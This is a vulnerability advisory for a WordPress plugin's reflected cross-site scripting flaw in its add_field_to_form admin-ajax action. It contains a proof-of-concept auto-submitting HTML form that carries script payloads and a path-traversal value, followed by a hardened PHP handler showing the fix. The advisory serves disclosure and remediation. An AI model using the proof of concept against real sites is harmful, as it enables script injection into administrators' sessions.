The plugin does not sanitise and escape the field_name and field_type parameters of its add_field_to_form admin-ajax action before outputting them back in HTML attributes, leading to Reflected Cross-Site Scripting issues.
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="add_field_to_form" />
<input type="hidden" name="field_name" value='xxxxxxxxxxxx"><script>alert(/XSS-field_name/)</script>' />
<input type="hidden" name="field_type" value='"><script>alert(/XSS-field_type/)</script>' />
<input type="hidden" name="list_id" value="../../../../../" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
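The remediation the advisory implies is to sanitise the two parameters on input and escape them for the attribute context on output. The handler below is an added example written for this page, not the plugin's own code: the action name and the field_name, field_type and list_id parameters come from the PoC above, while the nonce action name, the manage_options capability check, the allow-list of field types and the treatment of list_id as an integer are assumptions made for the illustration.

```php
<?php
// Added example of a hardened admin-ajax handler; not the affected plugin's code.
// Assumed: nonce action 'add_field_to_form_nonce', capability 'manage_options',
// the allow-list of field types, and that list_id is a numeric ID.

add_action( 'wp_ajax_add_field_to_form', 'example_add_field_to_form' );

function example_add_field_to_form() {
    // A nonce check rejects a cross-site POST such as the auto-submitting
    // form in the PoC before any parameter is processed.
    check_ajax_referer( 'add_field_to_form_nonce', 'nonce' );

    // Only users allowed to manage the plugin reach the rest of the handler.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Sanitise on input: strip tags, stray whitespace and control characters.
    $field_name = isset( $_POST['field_name'] )
        ? sanitize_text_field( wp_unslash( $_POST['field_name'] ) )
        : '';

    // Validate field_type against an allow-list instead of echoing free text.
    $allowed_types = array( 'text', 'email', 'number', 'textarea' );
    $field_type    = isset( $_POST['field_type'] ) ? sanitize_key( $_POST['field_type'] ) : '';
    if ( ! in_array( $field_type, $allowed_types, true ) ) {
        wp_send_json_error( 'invalid field_type', 400 );
    }

    // list_id is assumed to be a numeric identifier; absint() drops anything else.
    $list_id = isset( $_POST['list_id'] ) ? absint( $_POST['list_id'] ) : 0;

    // Escape on output for the attribute context the values land in; this is
    // the step whose absence produces the reflected XSS described above.
    $html = sprintf(
        '<input type="%1$s" name="%2$s" data-list="%3$d" />',
        esc_attr( $field_type ),
        esc_attr( $field_name ),
        $list_id
    );

    wp_send_json_success( array( 'html' => $html ) );
}
```

With this handler the PoC form fails at the nonce check, and even a request that carries a valid nonce has its quote and angle-bracket characters encoded by esc_attr() before they reach the response.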
ZhongFu Su(JrXnm) of Wuhan University
Yes
2021-12-21 (about 1 year ago)
2022-09-26 (about 4 months ago)